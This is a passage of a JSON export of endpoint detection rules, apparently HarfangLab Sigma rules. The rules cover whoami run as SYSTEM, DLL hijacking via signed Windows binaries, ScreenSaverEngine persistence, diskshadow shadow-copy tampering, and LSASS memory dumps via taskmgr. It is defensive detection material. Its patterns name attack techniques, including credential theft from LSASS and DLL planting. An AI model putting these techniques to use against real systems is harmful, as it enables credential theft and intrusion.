'?:\\Windows\\ccmcache\\'\n\n exclusion_stormshield:\n CurrentDirectory: '?:\\Program Files\\Stormshield\\Stormshield SSL VPN Client\\scripts\\'\n\n exclusion_tivoli:\n - ParentImage: '?:\\IBM\\ITM\\TMAITM6_x64\\\\*'\n - CurrentDirectory: '?:\\IBM\\ITM\\TMAITM6_x64\\'\n\n exclusion_openedge:\n CommandLine: '?:\\Windows\\System32\\whoami.exe /USER /NH'\n Ancestors|contains|all:\n - '\\bin\\admsrvc.exe|'\n - '\\jre\\bin\\java.exe|'\n\n exclusion_intune:\n ParentImage: '?:\\Windows\\System32\\msiexec.exe'\n CurrentDirectory: '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\'\n\n exclusion_serviceportalagent:\n ParentImage: '?:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\ServicePortalAgent\\app-*\\emulator\\MmrAgent.NetFxEmulator.exe'\n GrandparentImage: '?:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\ServicePortalAgent\\app-*\\ServicePortalAgent.exe'\n\n exclusion_azure:\n ParentImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n ParentCommandLine|contains|all:\n - '-Command & { whoami;ipmo '\n - '?:\\Program Files\\Microsoft Azure AD Connect Health Agent\\Modules\\AdHealthConfiguration\\AdHealthConfiguration.psd1'\n - '; Test-AzureADConnectHealthConnectivity -Role Sync'\n\n exclusion_microsoft:\n ProcessParentOriginalFileName: 'MmrAgent.NetFxEmulator.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n exclusion_schedule:\n - GrandparentCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - '?:\\Windows\\System32\\taskeng.exe'\n - ProcessParentGrandparentCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n - '?:\\Windows\\System32\\taskeng.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "77575317-f87a-49a1-b295-f2a7a23f75d4",
"rule_name": "Whoami Execution by System",
"rule_description": "Detects the execution of whoami.exe by the SYSTEM account.\nThis command is often used by attackers during the discovery phase.\nThis command being executed by the SYSTEM account may be related to an ongoing Local Privilege Escalation (LPE) vulnerability exploitation.\nIt is recommended to investigate the ancestors of the whoami process to determine if they are either linked with malicious processes, the result of a successful elevation of privileges or a legitimate administrative or applicative action.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2025-11-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1069"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "77632f65-c971-408e-a7c3-eea122b534e2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590938Z",
"creation_date": "2026-03-23T11:45:34.590942Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590949Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_redircmp.yml",
"content": "title: DLL Hijacking via redircmp.exe\nid: 77632f65-c971-408e-a7c3-eea122b534e2\ndescription: |\n Detects potential Windows DLL Hijacking via redircmp.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'redircmp.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "77632f65-c971-408e-a7c3-eea122b534e2",
"rule_name": "DLL Hijacking via redircmp.exe",
"rule_description": "Detects potential Windows DLL Hijacking via redircmp.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7793d0ef-0704-4067-8070-87daf4186792",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.075470Z",
"creation_date": "2026-03-23T11:45:34.075472Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.075476Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://posts.specterops.io/saving-your-access-d562bf5bf90b",
"https://attack.mitre.org/techniques/T1546/002/"
],
"name": "t1546_0002_screensaver_persistence_execution.yml",
"content": "title: Suspicious Process Execution via ScreenSaverEngine\nid: 7793d0ef-0704-4067-8070-87daf4186792\ndescription: |\n Detects the execution of a suspicious process by the screen saver engine.\n ScreenSaverEngine can be manipulated by adversaries to execute arbitrary commands when the screensaver is activated.\n It is recommended to check the legitimacy of the process by analyzing the process behavior.\nreferences:\n - https://posts.specterops.io/saving-your-access-d562bf5bf90b\n - https://attack.mitre.org/techniques/T1546/002/\ndate: 2024/07/23\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1546.002\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n ProcessParentImage|endswith: '\\ScreenSaverEngine'\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7793d0ef-0704-4067-8070-87daf4186792",
"rule_name": "Suspicious Process Execution via ScreenSaverEngine",
"rule_description": "Detects the execution of a suspicious process by the screen saver engine.\nScreenSaverEngine can be manipulated by adversaries to execute arbitrary commands when the screensaver is activated.\nIt is recommended to check the legitimacy of the process by analyzing the process behavior.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-01-28",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1546.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7795856c-9d2d-4fdb-be8d-b49f4200f515",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593182Z",
"creation_date": "2026-03-23T11:45:34.593185Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593193Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_agentactivationruntimestarter.yml",
"content": "title: DLL Hijacking via agentactivationruntimestarter.exe\nid: 7795856c-9d2d-4fdb-be8d-b49f4200f515\ndescription: |\n Detects potential Windows DLL Hijacking via agentactivationruntimestarter.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'agentactivationruntimestarter.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\msvcp110_win.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7795856c-9d2d-4fdb-be8d-b49f4200f515",
"rule_name": "DLL Hijacking via agentactivationruntimestarter.exe",
"rule_description": "Detects potential Windows DLL Hijacking via agentactivationruntimestarter.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "77fd5223-a8d4-4a30-9c54-4ef3605b960b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072331Z",
"creation_date": "2026-03-23T11:45:34.072334Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072338Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_explorer_suspicious_dll.yml",
"content": "title: Phantom DLL Hijacking via explorer.exe\nid: 77fd5223-a8d4-4a30-9c54-4ef3605b960b\ndescription: |\n Detects a suspicious DLL loaded by the explorer process from the Windows root folder.\n Everytime explorer.exe is started, non-existing DLL files are loaded from the Windows root folder.\n Adversaries may execute their own malicious payloads by planting a DLL in \"C:\\Windows\" path to exploit the Windows DLL search order.\n It is recommended to investigate the behavior of the loading process to identify any suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/07/23\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DLLHijacking\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith:\n - '?:\\Windows\\AEPIC.dll'\n - '?:\\Windows\\apphelp.dll'\n - '?:\\Windows\\CoreMessaging.dll'\n - '?:\\Windows\\dwmapi.dll'\n - '?:\\Windows\\dxgi.dll'\n - '?:\\Windows\\edputil.dll'\n - '?:\\Windows\\iertutil.dll'\n - '?:\\Windows\\imageres.dll'\n - '?:\\Windows\\IPHLPAPI.DLL'\n - '?:\\Windows\\MsftEdit.dll'\n - '?:\\Windows\\netutils.dll'\n - '?:\\Windows\\profapi.dll'\n - '?:\\Windows\\PROPSYS.dll'\n - '?:\\Windows\\shell32.dll'\n - '?:\\Windows\\srvcli.dll'\n - '?:\\Windows\\SspiCli.dll'\n - '?:\\Windows\\TWINAPI.dll'\n - '?:\\Windows\\UMPDC.dll'\n - '?:\\Windows\\urlmon.dll'\n - '?:\\Windows\\USERENV.dll'\n - '?:\\Windows\\UxTheme.dll'\n - '?:\\Windows\\WININET.dll'\n - '?:\\Windows\\Wldp.dll'\n - '?:\\Windows\\WTSAPI32.dll'\n Image|endswith: '\\explorer.exe'\n\n exclusion_explorerpatcher:\n Product: 'ExplorerPatcher'\n Company: 'VALINET Solutions SRL'\n ImageLoaded: '?:\\windows\\dxgi.dll'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "77fd5223-a8d4-4a30-9c54-4ef3605b960b",
"rule_name": "Phantom DLL Hijacking via explorer.exe",
"rule_description": "Detects a suspicious DLL loaded by the explorer process from the Windows root folder.\nEverytime explorer.exe is started, non-existing DLL files are loaded from the Windows root folder.\nAdversaries may execute their own malicious payloads by planting a DLL in \"C:\\Windows\" path to exploit the Windows DLL search order.\nIt is recommended to investigate the behavior of the loading process to identify any suspicious activities.\n",
"rule_creation_date": "2024-07-23",
"rule_modified_date": "2025-04-08",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "782084c7-cf6b-427b-9e05-3eee21b76269",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079242Z",
"creation_date": "2026-03-23T11:45:34.079244Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079249Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/",
"https://attack.mitre.org/techniques/T1490/"
],
"name": "t1490_diskshadow_program_called.yml",
"content": "title: Diskshadow Program Execution\nid: 782084c7-cf6b-427b-9e05-3eee21b76269\ndescription: |\n Detects the execution of diskshadow.exe, a tool used to manage Volume Shadow Service (VSS) shadow copies.\n This can be used maliciously by threat actors or ransomware to create or delete shadow copies, potentially as a precursor to data encryption or destruction.\n It is recommended to investigate the process initiating diskshadow.exe and check for unauthorized changes to shadow copy settings.\n If this is part of a backup script and recurring on your environment, it is highly recommended to whitelist the concerned processes.\nreferences:\n - https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/\n - https://attack.mitre.org/techniques/T1490/\ndate: 2020/09/28\nmodified: 2025/09/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1490\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Diskshadow\n - classification.Windows.Behavior.Deletion\n - classification.Windows.Behavior.VolumeShadowCopy\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\diskshadow.exe'\n # renamed binaries\n - OriginalFileName: 'diskshadow.exe'\n\n exclusion_commvault:\n # diskshadow -l \"C:\\Program Files\\Commvault\\ContentStore\\iDataAgent\\FileSystemAgent\\OneTouch\\535781\\DiskshadowOutputSource.txt\" -s \"C:\\Program Files\\Commvault\\ContentStore\\iDataAgent\\FileSystemAgent\\OneTouch\\535781\\DiskshadowScript.txt\"\n # diskshadow -l \"C:\\Program Files\\Commvault\\ContentStore2\\iDataAgent\\FileSystemAgent\\OneTouch\\558744\\DiskshadowOutputSource.txt\" -s \"C:\\Program Files\\Commvault\\ContentStore2\\iDataAgent\\FileSystemAgent\\OneTouch\\558744\\DiskshadowScript.txt\"\n # E:\\CommVault\\Simpana\\iDataAgent\\FileSystemAgent\\OneTouch\\1188660\\DiskshadowOutputSource.txt\"\"\n # note the ContentStore and ContentStore2 ...\n CommandLine|contains:\n - ':\\Program Files\\Commvault\\ContentStore*\\iDataAgent\\FileSystemAgent*DiskshadowOutputSource*DiskshadowScript'\n - '\\CommVault\\Simpana\\iDataAgent\\FileSystemAgent\\\\*\\DiskshadowOutputSource.txt'\n\n exclusion_programfiles:\n ProcessParentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "782084c7-cf6b-427b-9e05-3eee21b76269",
"rule_name": "Diskshadow Program Execution",
"rule_description": "Detects the execution of diskshadow.exe, a tool used to manage Volume Shadow Service (VSS) shadow copies.\nThis can be used maliciously by threat actors or ransomware to create or delete shadow copies, potentially as a precursor to data encryption or destruction.\nIt is recommended to investigate the process initiating diskshadow.exe and check for unauthorized changes to shadow copy settings.\nIf this is part of a backup script and recurring on your environment, it is highly recommended to whitelist the concerned processes.\n",
"rule_creation_date": "2020-09-28",
"rule_modified_date": "2025-09-23",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1490"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "78397a73-7ba5-4e02-8847-6a3242d29f28",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078198Z",
"creation_date": "2026-03-23T11:45:34.078200Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078204Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1003/001/",
"https://www.oreilly.com/library/view/advanced-infrastructure-penetration/9781788624480/c54099a7-b74b-4130-9c8b-9aba41d42fb5.xhtml",
"https://www.deepinstinct.com/blog/lsass-memory-dumps-are-stealthier-than-ever-before"
],
"name": "t1003_001_lsass_memory_dump_with_taskmgr.yml",
"content": "title: LSASS Process Memory Dumped via taskmgr.exe\nid: 78397a73-7ba5-4e02-8847-6a3242d29f28\ndescription: |\n Detects an attempt to dump the LSASS' process memory using taskmgr.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to analyze the user session for suspicious activities, investigate any further malicious actions on the host and to start memory forensics to determine stolen credentials.\nreferences:\n - https://attack.mitre.org/techniques/T1003/001/\n - https://www.oreilly.com/library/view/advanced-infrastructure-penetration/9781788624480/c54099a7-b74b-4130-9c8b-9aba41d42fb5.xhtml\n - https://www.deepinstinct.com/blog/lsass-memory-dumps-are-stealthier-than-ever-before\ndate: 2021/04/30\nmodified: 2025/02/07\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.LSASSAccess\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Image|endswith: '\\Taskmgr.exe'\n Path|endswith: '\\lsass*.DMP'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "78397a73-7ba5-4e02-8847-6a3242d29f28",
"rule_name": "LSASS Process Memory Dumped via taskmgr.exe",
"rule_description": "Detects an attempt to dump the LSASS' process memory using taskmgr.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIt is recommended to analyze the user session for suspicious activities, investigate any further malicious actions on the host and to start memory forensics to determine stolen credentials.\n",
"rule_creation_date": "2021-04-30",
"rule_modified_date": "2025-02-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "7844c8c3-e241-4242-8895-60841cc6f2b3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090116Z",
"creation_date": "2026-03-23T11:45:34.090118Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090122Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rmactivate_isv.yml",
"content": "title: DLL Hijacking via rmactivate_isv.exe\nid: 7844c8c3-e241-4242-8895-60841cc6f2b3\ndescription: |\n Detects potential Windows DLL Hijacking via rmactivate_isv.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rmactivate_isv.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\cryptsp.dll'\n - '\\msdrm.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "7844c8c3-e241-4242-8895-60841cc6f2b3",
"rule_name": "DLL Hijacking via rmactivate_isv.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rmactivate_isv.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "784b1d19-3290-4508-abce-87295ed4de1a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
